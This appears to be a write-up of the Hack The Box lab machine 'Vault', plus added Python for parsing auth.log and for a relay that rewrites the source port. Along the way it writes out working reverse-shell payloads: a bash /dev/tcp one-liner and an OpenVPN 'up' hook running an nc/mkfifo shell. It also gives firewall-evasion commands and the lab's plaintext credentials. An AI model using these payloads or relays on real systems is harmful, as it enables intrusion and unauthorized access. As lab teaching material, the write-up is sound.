
Vault

Port Scan

$ sudo nmap 10.129.189.113 -p- --min-rate=10000 -T4 -sCV
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a6:9d:0f:7d:73:75:bb:a8:94:0a:b7:e3:fe:1f:24:f4 (RSA)
|   256 2c:7c:34:eb:3a:eb:04:03:ac:48:28:54:09:74:3d:27 (ECDSA)
|_  256 98:42:5f:ad:87:22:92:6d:72:e6:66:6c:82:c1:09:83 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web App


The index page only mentions Sparklays. Guessing that as a path in the browser turned up a login page at http://10.129.189.113/sparklays/admin.php, so the next step is enumerating that directory.

$ gobuster dir --url http://10.129.189.113/sparklays/ -w /usr/share/seclists/Discovery/Web-Content/common.txt 

/.htpasswd            (Status: 403) [Size: 308]
/.htaccess            (Status: 403) [Size: 308]
/.hta                 (Status: 403) [Size: 303]
/admin.php            (Status: 200) [Size: 615]
/design               (Status: 301) [Size: 327] [--> http://10.129.189.113/sparklays/design/]

$ gobuster dir --url http://10.129.189.113/sparklays/design/  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php -t 50

/.html                (Status: 403) [Size: 311]
/.php                 (Status: 403) [Size: 310]
/uploads              (Status: 301) [Size: 335] [--> http://10.129.189.113/sparklays/design/uploads/]
/design.html          (Status: 200) [Size: 72]

$ sqlmap -r login.req --random-agent --level=5 --risk=3 --batch --dbms mysql --dbs

http://10.129.189.113/sparklays/design/design.html

design.html leads to a file upload page, and uploads land in /sparklays/design/uploads/. With a listener on 10.10.14.215:4445, an uploaded PHP file that runs the following command returns a reverse shell:

bash -c 'bash -i >& /dev/tcp/10.10.14.215/4445 0>&1'

In /home/dave/Desktop there are several interesting files (among them Servers and key):

Dave

$ cat Servers
DNS + Configurator - 192.168.122.4
Firewall - 192.168.122.5
The Vault - x

$ ssh dave@10.129.189.113
# password: Dav3therav3123

# listeners on the Ubuntu host: 192.168.122.1 is one of its own addresses, so the
# internal network from the Servers file is reachable from this box
$ netstat -tunl

tcp        0      0 192.168.122.1:53        0.0.0.0:*               LISTEN  
$ nc -zv 192.168.122.1 80
Connection to 192.168.122.1 80 port [tcp/http] succeeded!

# DNS server (192.168.122.4) also serves HTTP
$ nc -zv 192.168.122.4 80
Connection to 192.168.122.4 80 port [tcp/http] succeeded!
$ wget http://192.168.122.4

# port forwarding: expose the DNS server's web interface on the attacking machine
$ ssh -L 8081:192.168.122.4:80 dave@10.129.189.113 

# then browse to http://127.0.0.1:8081/ (this is a local forward, not a proxy, so no proxy setting is needed)


# malicious OpenVPN config file: "script-security 2" allows user-defined scripts,
# so the "up" hook runs an arbitrary command as whatever user starts the VPN test.
# Start the listener on the Ubuntu host first: nc -lvnp 8181
remote 192.168.122.1
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up "/bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.122.1 8181 >/tmp/f'"
nobind

Save this as the VPN configuration and click Test VPN; the listener receives a shell from the DNS server (192.168.122.4).


$ cat /home/dave/ssh
dave
dav3gerous567

# dave can use sudo on the DNS server, so get root
$ sudo su


$ cat /home/alex/.bash_history
.....
ping 192.168.5.2
su root
......

$ grep -r "192.168.5.2" /var/log
Binary file /var/log/auth.log matches
Binary file /var/log/btmp matches

# -a forces grep to treat the log files as text
$ grep -rHa "192.168.5.2" /var/log
............
/var/log/auth.log:Sep  2 15:07:51 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f
/var/log/auth.log:Sep  2 15:10:20 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/ncat -l 1234 --sh-exec ncat 192.168.5.2 987 -p 53
/var/log/auth.log:Sep  2 15:10:34 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/ncat -l 3333 --sh-exec ncat 192.168.5.2 987 -p 53
...............

These commands give away how the previous operator reached the Vault (192.168.5.2): the scan was fragmented and sent from source port 4444, and a local ncat listener relayed connections to 192.168.5.2:987 with source port 53 (ncat's -p sets the source port). The firewall evidently filters on the source port, so the same trick should work again.
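Grepping the logs is enough here, but sudo lines in auth.log are structured and worth parsing properly when hunting for pivot hints like these. The following Python is an added example, not part of this writeup: it splits each sudo line into its fields, then pulls the target host, source port and listen port out of nmap/ncat commands so you can see at a glance which source ports the firewall appears to trust. The sample log is constructed from the three lines above plus two filler lines (a benign sudo entry and an sshd line) that should be ignored.

```python
import re

# Constructed sample: the three sudo lines quoted from the Vault auth.log above,
# plus one benign sudo line and one sshd line that the extractor must skip.
SAMPLE_AUTH_LOG = """\
Sep  2 14:59:03 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/apt-get update
Sep  2 15:00:11 DNS sshd[1031]: Accepted password for dave from 192.168.122.1 port 51234 ssh2
Sep  2 15:07:51 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f
Sep  2 15:10:20 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/ncat -l 1234 --sh-exec ncat 192.168.5.2 987 -p 53
Sep  2 15:10:34 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/ncat -l 3333 --sh-exec ncat 192.168.5.2 987 -p 53
"""

# syslog-style sudo line: "<ts> <host> sudo: <user> : TTY=.. ; PWD=.. ; USER=.. ; COMMAND=.."
SUDO_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) sudo:\s+(?P<user>\S+) : "
    r"TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$"
)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# first nmap/ncat/nc token in the command, whether bare or with a path prefix
TOOL_RE = re.compile(r"(?:^|/)(nmap|ncat|nc)\b")


def parse_sudo(lines):
    """Yield one dict per sudo line (ts, host, user, tty, pwd, runas, cmd); other lines are skipped."""
    for line in lines:
        m = SUDO_RE.match(line.rstrip("\n"))
        if m:
            yield m.groupdict()


def pivot_hints(log_text: str) -> list:
    """Extract tool, target IPs, source port and listen port from sudo'd nmap/ncat commands."""
    hints = []
    for entry in parse_sudo(log_text.splitlines()):
        cmd = entry["cmd"]
        tool = TOOL_RE.search(cmd)
        if not tool:
            continue
        # IPs are taken from the command only, so the client address of an sshd line never leaks in
        targets = list(dict.fromkeys(IPV4_RE.findall(cmd)))
        if tool.group(1) == "nmap":
            src = re.search(r"--source-port[= ](\d+)", cmd)
        else:  # ncat/nc: -p is the *source* port (nmap's -p would be the target port list)
            src = re.search(r"(?:^|\s)-p\s*(\d+)", cmd)
        listen = re.search(r"(?:^|\s)-l\s*(\d+)", cmd)
        hints.append({
            "user": entry["user"],
            "tool": tool.group(1),
            "targets": targets,
            "source_port": int(src.group(1)) if src else None,
            "listen_port": int(listen.group(1)) if listen else None,
            "cmd": cmd,
        })
    return hints


def trusted_source_ports(log_text: str) -> set:
    """Source ports the previous operator had to use: candidates for the firewall's allow-list."""
    return {h["source_port"] for h in pivot_hints(log_text) if h["source_port"] is not None}


if __name__ == "__main__":
    for h in pivot_hints(SAMPLE_AUTH_LOG):
        print(h["tool"], h["targets"], "src", h["source_port"], "listen", h["listen_port"])
    print("trusted source ports:", sorted(trusted_source_ports(SAMPLE_AUTH_LOG)))
```

On the sample this reports 192.168.5.2 as the only target and {53, 4444} as the source ports to try, which is exactly the hint the grep output gave by eye; on a real /var/log/auth.log you would feed the file contents in instead of the constructed string.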


# plain scan of the Vault from the DNS server: the firewall drops it
nmap 192.168.5.2 -Pn -f

# same scan from the source port found in auth.log: now it gets through and shows the open ports
nmap 192.168.5.2 -Pn -f --source-port=4444

# relay on the DNS server: anything hitting local port 1234 is forwarded to the
# Vault's port 987 (its SSH) from source port 53, which the firewall allows
$ /usr/bin/ncat -l 1234 --sh-exec "ncat 192.168.5.2 987 -p 53" &

$ ssh dave@localhost -p 1234
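The ncat pair above is a source-port-rewriting relay: the listener accepts the SSH client on 1234 and the inner ncat opens the leg to 192.168.5.2:987 from source port 53, which is the only thing the firewall looks at. As an added example that is not part of this writeup, here is the same relay in Python, which makes the one moving part explicit (bind() on the upstream socket before connect()). Binding port 53 needs root, so the self-contained demo, which talks to a constructed loopback echo server instead of the Vault, uses 40053; the port number and the probe bytes are assumptions made only for the demo.

```python
import socket
import threading


def pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until EOF, then half-close dst so the EOF propagates."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def handle_client(client: socket.socket, target: tuple, source_port: int) -> None:
    """Open the upstream leg from a fixed source port, then shuffle bytes both ways."""
    upstream = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # SO_REUSEADDR lets the same source port be rebound while an old leg sits in TIME_WAIT
    upstream.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    upstream.bind(("0.0.0.0", source_port))  # the trick: a source port the firewall trusts
    try:
        upstream.connect(target)
        t = threading.Thread(target=pump, args=(client, upstream), daemon=True)
        t.start()
        pump(upstream, client)
        t.join()
    finally:
        client.close()
        upstream.close()


def start_relay(listen: tuple, target: tuple, source_port: int):
    """Listen on `listen` and forward each connection to `target` from `source_port`.
    Returns (listening socket, bound port); close the socket to stop the relay."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(listen)
    srv.listen(5)

    def accept_loop():
        while True:
            try:
                client, _ = srv.accept()
            except OSError:  # listener closed
                return
            threading.Thread(target=handle_client, args=(client, target, source_port), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def demo(source_port: int = 40053) -> tuple:
    """Loopback check: a constructed echo server records the peer port it sees.
    Returns (bytes echoed back through the relay, source port observed by the target)."""
    seen = {}
    ready, done = threading.Event(), threading.Event()

    def target_server():
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            s.bind(("127.0.0.1", 0))
            s.listen(1)
            seen["port"] = s.getsockname()[1]
            ready.set()
            conn, peer = s.accept()
            with conn:
                seen["peer_port"] = peer[1]  # what a source-port firewall would inspect
                while True:
                    data = conn.recv(4096)
                    if not data:
                        break
                    conn.sendall(data)
            done.set()

    threading.Thread(target=target_server, daemon=True).start()
    ready.wait(5)
    relay, relay_port = start_relay(("127.0.0.1", 0), ("127.0.0.1", seen["port"]), source_port)
    try:
        with socket.create_connection(("127.0.0.1", relay_port), timeout=5) as c:
            c.sendall(b"SSH-2.0-probe\r\n")  # constructed probe standing in for the SSH client
            c.shutdown(socket.SHUT_WR)
            reply = b""
            while True:
                chunk = c.recv(4096)
                if not chunk:
                    break
                reply += chunk
    finally:
        relay.close()
    done.wait(5)
    return reply, seen["peer_port"]


if __name__ == "__main__":
    print(demo())
```

Like the ncat version, this can only hold one upstream connection per destination at a time, because every leg wants the same local port; that is fine for a single SSH session. Against the real target the call would be start_relay(("127.0.0.1", 1234), ("192.168.5.2", 987), 53), run as root so port 53 can be bound.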


Escape rbash

# the ncat relay serves a single connection and then exits, so start it again
$ /usr/bin/ncat -l 1234 --sh-exec "ncat 192.168.5.2 987 -p 53" &

# dave's login shell on the Vault is rbash; request a tty and run bash instead
$ ssh dave@localhost -p 1234 -t bash

# in dave's home folder, there is file called root.txt.gpg
$ gpg -d root.txt.gpg

gpg: encrypted with RSA key, ID D1EB1F03
gpg: decryption failed: secret key not available

The matching key lives on the Ubuntu host (192.168.122.1), where /home/dave/Desktop also holds a file called key. So the encrypted file has to travel back there, and the only channel is the terminal.

# on Vault: encode the file so it can be copied through the terminal
$ base32 -w0 root.txt.gpg 

# on Ubuntu: decode it and decrypt it with dave's key; the passphrase is the contents of the key file
$ echo QUBAYA6HPDD..... | base32 -d > a.gpg

$ gpg -d a.gpg
# passphrase: itscominghome